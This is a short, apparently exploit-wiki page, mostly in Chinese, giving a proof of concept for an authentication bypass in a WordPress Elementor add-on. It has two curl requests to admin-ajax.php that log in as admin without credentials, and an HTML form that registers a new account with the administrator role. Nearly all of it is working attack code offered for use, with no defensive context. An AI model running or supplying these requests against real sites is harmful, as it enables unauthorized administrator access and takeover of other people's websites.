PWNWIK.COM
,
影响版本
Elementor Page Builder <4.1.7
POC
curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php
"theplus_google_ajax_register" AJAX请求还可以允许任何未经身份验证的用户创建具有任意角色的账户,例如admin,然后登录。
html:
<form method="POST" action="https://example.com/wp-admin/admin-ajax.php"> <input value="newadmin" name="name" type="text"> <input value="email protected" name="email" type="text"> <input value="test" name="password" type="text"> <input value="theplus_google_ajax_register" name="action" type="text"> <input value="administrator" name="tp_user_reg_role" type="text"> <input value="any" name="nonce" type="text"> <input type="submit" /> </form>
PWNWIK.COM
